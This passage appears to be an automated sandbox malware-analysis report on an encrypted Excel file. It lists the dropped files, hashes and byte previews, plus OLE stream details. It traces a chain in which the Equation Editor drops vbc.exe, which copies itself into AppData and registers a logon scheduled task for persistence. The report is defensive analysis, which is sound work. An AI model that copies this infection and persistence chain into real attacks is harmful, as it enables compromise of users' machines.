                                                                                      Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\mso4EA2.tmp
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                                                                                      Category:dropped
                                                                                      Size (bytes):1254
                                                                                      Entropy (8bit):5.835900066445133
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                                                                                      MD5:A3C62E516777C15BF216F12143693C61
                                                                                      SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                                                                                      SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                                                                                      SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                                                                                      Malicious:false
                                                                                      Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoF96C.tmp
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                                                                                      Category:dropped
                                                                                      Size (bytes):1254
                                                                                      Entropy (8bit):5.835900066445133
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                                                                                      MD5:A3C62E516777C15BF216F12143693C61
                                                                                      SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                                                                                      SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                                                                                      SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                                                                                      Malicious:false
                                                                                      Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoF96D.tmp
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                                                                                      Category:dropped
                                                                                      Size (bytes):1254
                                                                                      Entropy (8bit):5.835900066445133
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                                                                                      MD5:A3C62E516777C15BF216F12143693C61
                                                                                      SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                                                                                      SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                                                                                      SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                                                                                      Malicious:false
                                                                                      Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoF96E.tmp
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                                                                                      Category:dropped
                                                                                      Size (bytes):1254
                                                                                      Entropy (8bit):5.835900066445133
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                                                                                      MD5:A3C62E516777C15BF216F12143693C61
                                                                                      SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                                                                                      SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                                                                                      SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                                                                                      Malicious:false
                                                                                      Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
                                                                                      C:\Users\user\AppData\Local\Temp\Cab6E6E.tmp
                                                                                      Process:C:\Users\Public\vbc.exe
                                                                                      File Type:Microsoft Cabinet archive data, 61020 bytes, 1 file
                                                                                      Category:dropped
                                                                                      Size (bytes):61020
                                                                                      Entropy (8bit):7.994886945086499
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:IZ/FdeYPeFusuQszEfL0/NfXfdl5lNQbGxO4EBJE:0tdeYPiuWAVtlLBGm
                                                                                      MD5:2902DE11E30DCC620B184E3BB0F0C1CB
                                                                                      SHA1:5D11D14A2558801A2688DC2D6DFAD39AC294F222
                                                                                      SHA-256:E6A7F1F8810E46A736E80EE5AC6187690F28F4D5D35D130D410E20084B2C1544
                                                                                      SHA-512:EFD415CDE25B827AC2A7CA4D6486CE3A43CDCC1C31D3A94FD7944681AA3E83A4966625BF2E6770581C4B59D05E35FF9318D9ADADDADE9070F131076892AF2FA0
                                                                                      Malicious:false
                                                                                      Preview: MSCF....\.......,...................I........l.........R.q .authroot.stl.N....5..CK..8T....c_.d....A.K....=.D.eWI..r."Y...."i..,.=.l.D.....3...3WW.......y...9..w..D.yM10....`.0.e.._.'..a0xN....)F.C..t.z.,.O20.1``L.....m?H..C..X>Oc..q.....%.!^v%<...O...-..@/.......H.J.W...... T...Fp..2.|$....._Y..Y`&..s.1........s.{..,.":o}9.......%._.xW*S.K..4"9......q.G:.........a.H.y.. ..r...q./6.p.;.`=*.Dwj......!......s).B..y.......A.!W.........D!s0..!"X...l.....D0...........Ba...Z.0.o..l.3.v..W1F hSp.S)@.....'Z..QW...G...G.G.y+.x...aa`.3..X&4E..N...._O..<X.......K...xm..+M...O.H...)..........*..o..~4.6.......p.`Bt.(..*V.N.!.p.C>..%.ySXY.>.`..f|.*...'^K`\..e......j/..|..)..&i...wEj.w...o..r<.$.....C.....}.x...L..&..).r..\...>....v........7...^..L!.$..'m...*,*.....7F$..~..S.6$S.-y....|.!.....x...~k...Q/.w.e...h.[...9<x...Q.x.][}*_%Z..K.).3..'....M.6QkJ.N........Y..Q.n.[.(.... ...Bg..33..[...S..[... .Z..<i.-.]...po.k.,...X6......y3^.t[.Dw.]ts. R..L..`..ut_F....
                                                                                      C:\Users\user\AppData\Local\Temp\Tar6E6F.tmp
                                                                                      Process:C:\Users\Public\vbc.exe
                                                                                      File Type:data
                                                                                      Category:modified
                                                                                      Size (bytes):158974
                                                                                      Entropy (8bit):6.311775051607851
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:ilqXley2pR737/99UF210gNucQodv+1//dMrYJntYyjCQx7s2t6OGP:iQXipR7O/gNuc/v+lXjCQ7sO0
                                                                                      MD5:E4731F8A3E7352DBA44EC7D3DD15BAEA
                                                                                      SHA1:D5CA0025FBD356DEB8EDE35001F93039625562A5
                                                                                      SHA-256:6C78EF77ACEF978321CCD30EE126FB7D30285BC186DDBDBE8B3E8F6E69D01353
                                                                                      SHA-512:E68BA11A73E28404A274F0EE4ECC97A8BEFEDB91A20BDC5B00C72AE8928DD63924E351BE8A88E40960D54CE07E21EA21710DB0DFA00A5558C4264490E27B6988
                                                                                      Malicious:false
                                                                                      Preview: 0..l...*.H.........l.0..l....1.0...`.H.e......0..\...+.....7.....\.0..\.0...+.....7........_.T.....210611210413Z0...+......0..\.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                                                      C:\Users\user\AppData\Local\Temp\tmp74F2.tmp
                                                                                      Process:C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1626
                                                                                      Entropy (8bit):5.159109128857439
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBntn:cbhZ7ClNQi/rydbz9I3YODOLNdq3z
                                                                                      MD5:2A11DAC0B7306A104AFCC907AE492B39
                                                                                      SHA1:CE842A57682BA01171DBBFB98C189DE9920B42CA
                                                                                      SHA-256:92866CDA7C15EBE0904C2F5BB77D1764EBC9577E7ADE131AE9EECD0378EB9151
                                                                                      SHA-512:5187B3DBE1BF2E63A02B6F3263BC30F92C15EC04575E2FB4DBE6C5C837BA05C6A7FB091462D1FAA8C2ED8E646C82B4D7F5D88A2B3A94B3A05C6518197942FCCD
                                                                                      Malicious:false
                                                                                      Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>user-PC\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>user-PC\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>user-PC\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true</StartWhenAvailable>
                                                                                      C:\Users\user\AppData\Local\Temp\tmp7511.tmp
                                                                                      Process:C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1626
                                                                                      Entropy (8bit):5.159109128857439
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBntn:cbhZ7ClNQi/rydbz9I3YODOLNdq3z
                                                                                      MD5:2A11DAC0B7306A104AFCC907AE492B39
                                                                                      SHA1:CE842A57682BA01171DBBFB98C189DE9920B42CA
                                                                                      SHA-256:92866CDA7C15EBE0904C2F5BB77D1764EBC9577E7ADE131AE9EECD0378EB9151
                                                                                      SHA-512:5187B3DBE1BF2E63A02B6F3263BC30F92C15EC04575E2FB4DBE6C5C837BA05C6A7FB091462D1FAA8C2ED8E646C82B4D7F5D88A2B3A94B3A05C6518197942FCCD
                                                                                      Malicious:false
                                                                                      Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>user-PC\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>user-PC\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>user-PC\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true</StartWhenAvailable>
                                                                                      C:\Users\user\AppData\Local\Temp\tmpB2BC.tmp
                                                                                      Process:C:\Users\Public\vbc.exe
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1626
                                                                                      Entropy (8bit):5.159109128857439
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBntn:cbhZ7ClNQi/rydbz9I3YODOLNdq3z
                                                                                      MD5:2A11DAC0B7306A104AFCC907AE492B39
                                                                                      SHA1:CE842A57682BA01171DBBFB98C189DE9920B42CA
                                                                                      SHA-256:92866CDA7C15EBE0904C2F5BB77D1764EBC9577E7ADE131AE9EECD0378EB9151
                                                                                      SHA-512:5187B3DBE1BF2E63A02B6F3263BC30F92C15EC04575E2FB4DBE6C5C837BA05C6A7FB091462D1FAA8C2ED8E646C82B4D7F5D88A2B3A94B3A05C6518197942FCCD
                                                                                      Malicious:true
                                                                                      Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>user-PC\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>user-PC\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>user-PC\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true</StartWhenAvailable>
                                                                                      C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe
                                                                                      Process:C:\Users\Public\vbc.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):479232
                                                                                      Entropy (8bit):7.4170903584629215
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:NUdeni+TLedHTiw3CzfM5B2OR0GU4V24TfWOQCs/I:KciCqdziw3KeRHtJHs/I
                                                                                      MD5:6733D5E8934EAFF7C0087E7DE2C8E62A
                                                                                      SHA1:6C0B89DC4C773E51D660780450CBD148F2FF3211
                                                                                      SHA-256:3441D4122B712A32E1C0518F02903A632ECBF557FBAB71C510C732474D326CD1
                                                                                      SHA-512:B6804A6968FA7A6F68D1A8F6161A0C69584DBFEB88EFF5F7784C259F2886FE1B444438576D47AB5DDA24496A619DFBFFE02050BC679A3F3E13DD6BC82F61C3C1
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 13%
                                                                                      Joe Sandbox View:
                                                                                      • Filename: kwFDCU89PZ.exe, Detection: malicious, Browse
                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....u.`..............0.. ... .......5... ...@....... ....................................@.................................05..O....@.......................`....................................................... ............... ..H............text........ ... .................. ..`.rsrc........@.......0..............@..@.reloc.......`.......@..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      C:\Users\user\AppData\Roaming\WzyRXCWtdGSdEA.exe
                                                                                      Process:C:\Users\Public\vbc.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):479232
                                                                                      Entropy (8bit):7.4170903584629215
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:NUdeni+TLedHTiw3CzfM5B2OR0GU4V24TfWOQCs/I:KciCqdziw3KeRHtJHs/I
                                                                                      MD5:6733D5E8934EAFF7C0087E7DE2C8E62A
                                                                                      SHA1:6C0B89DC4C773E51D660780450CBD148F2FF3211
                                                                                      SHA-256:3441D4122B712A32E1C0518F02903A632ECBF557FBAB71C510C732474D326CD1
                                                                                      SHA-512:B6804A6968FA7A6F68D1A8F6161A0C69584DBFEB88EFF5F7784C259F2886FE1B444438576D47AB5DDA24496A619DFBFFE02050BC679A3F3E13DD6BC82F61C3C1
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 13%
                                                                                      Joe Sandbox View:
                                                                                      • Filename: kwFDCU89PZ.exe, Detection: malicious, Browse
                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....u.`..............0.. ... .......5... ...@....... ....................................@.................................05..O....@.......................`....................................................... ............... ..H............text........ ... .................. ..`.rsrc........@.......0..............@..@.reloc.......`.......@..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      C:\Users\user\Desktop\~$Doc2.xlsx
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):330
                                                                                      Entropy (8bit):1.4377382811115937
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                      MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                      SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                      SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                      SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                      Malicious:true
                                                                                      Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                      C:\Users\Public\vbc.exe
                                                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):479232
                                                                                      Entropy (8bit):7.4170903584629215
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:NUdeni+TLedHTiw3CzfM5B2OR0GU4V24TfWOQCs/I:KciCqdziw3KeRHtJHs/I
                                                                                      MD5:6733D5E8934EAFF7C0087E7DE2C8E62A
                                                                                      SHA1:6C0B89DC4C773E51D660780450CBD148F2FF3211
                                                                                      SHA-256:3441D4122B712A32E1C0518F02903A632ECBF557FBAB71C510C732474D326CD1
                                                                                      SHA-512:B6804A6968FA7A6F68D1A8F6161A0C69584DBFEB88EFF5F7784C259F2886FE1B444438576D47AB5DDA24496A619DFBFFE02050BC679A3F3E13DD6BC82F61C3C1
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 13%
                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....u.`..............0.. ... .......5... ...@....... ....................................@.................................05..O....@.......................`....................................................... ............... ..H............text........ ... .................. ..`.rsrc........@.......0..............@..@.reloc.......`.......@..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:CDFV2 Encrypted
                                                                                      Entropy (8bit):7.994513765705169
                                                                                      TrID:
                                                                                      • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                      File name:Doc2.xlsx
                                                                                      File size:1239552
                                                                                      MD5:7848697a2cff990710c69e8d97e55c13
                                                                                      SHA1:9af272f7dedd808c48b03d98d7eb75356b74f6ee
                                                                                      SHA256:ef17f47bcdb067d712661ddadff8ebee2924282c7fe21edd237e8094cc4ebdb0
                                                                                      SHA512:ec702b7110b6bebb405442a297221a20e4339cd5997323b7fd86bf6ee58cd68d8fe14f4156cc13e482734ff849686fe0bd3c23674ad4b61b76bd3d26714c27ff
                                                                                      SSDEEP:24576:552SgH474uoQ5xCHB+kXRPewR/LK9TevVGPYQuboKULGA:55us4hQS+khvRDKdGVG6kKG
                                                                                      File Content Preview:........................>.......................................................................................................|.......~......................................................................................................................

                                                                                      File Icon

                                                                                      Icon Hash:e4e2aa8aa4b4bcb4

                                                                                      Static OLE Info

                                                                                      General

                                                                                      Document Type:OLE
                                                                                      Number of OLE Files:1

                                                                                      OLE File "Doc2.xlsx"

                                                                                      Indicators

                                                                                      Has Summary Info:False
                                                                                      Application Name:unknown
                                                                                      Encrypted Document:True
                                                                                      Contains Word Document Stream:False
                                                                                      Contains Workbook/Book Stream:False
                                                                                      Contains PowerPoint Document Stream:False
                                                                                      Contains Visio Document Stream:False
                                                                                      Contains ObjectPool Stream:
                                                                                      Flash Objects Count:
                                                                                      Contains VBA Macros:False

                                                                                      Streams

                                                                                      Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                                                      General
                                                                                      Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                                                      File Type:data
                                                                                      Stream Size:64
                                                                                      Entropy:2.73637206947
                                                                                      Base64 Encoded:False
                                                                                      Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                                                                      Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                                                                      Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                                                      General
                                                                                      Stream Path:\x6DataSpaces/DataSpaceMap
                                                                                      File Type:data
                                                                                      Stream Size:112
                                                                                      Entropy:2.7597816111
                                                                                      Base64 Encoded:False
                                                                                      Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                                                      Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                                                                      Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                                                                      General
                                                                                      Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                                                      File Type:data
                                                                                      Stream Size:200
                                                                                      Entropy:3.13335930328
                                                                                      Base64 Encoded:False
                                                                                      Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                      Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                                                                      Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                                                      General
                                                                                      Stream Path:\x6DataSpaces/Version
                                                                                      File Type:data
                                                                                      Stream Size:76
                                                                                      Entropy:2.79079600998
                                                                                      Base64 Encoded:False
                                                                                      Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                                                                      Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                                                                      Stream Path: EncryptedPackage, File Type: data, Stream Size: 1225928
                                                                                      General
                                                                                      Stream Path:EncryptedPackage
                                                                                      File Type:data
                                                                                      Stream Size:1225928
                                                                                      Entropy:7.99880681599
                                                                                      Base64 Encoded:True
                                                                                      Data ASCII:. . . . . . . . . H . . T . . . . t . . . 4 . . . . T , . . . . k \\ . . . 0 . . 8 . A . . . . . . . . . o . . . * . . . ( . ( 1 . . . S j . f E . v % q . Z p ) \\ u . . . . . . . v % q . Z p ) \\ u . . . . . . . v % q . Z p ) \\ u . . . . . . . v % q . Z p ) \\ u . . . . . . . v % q . Z p ) \\ u . . . . . . . v % q . Z p ) \\ u . . . . . . . v % q . Z p ) \\ u . . . . . . . v % q . Z p ) \\ u . . . . . . . v % q . Z p ) \\ u . . . . . . . v % q . Z p ) \\ u . . . . . . . v % q . Z p ) \\ u . . . . . . . v % q . Z p )
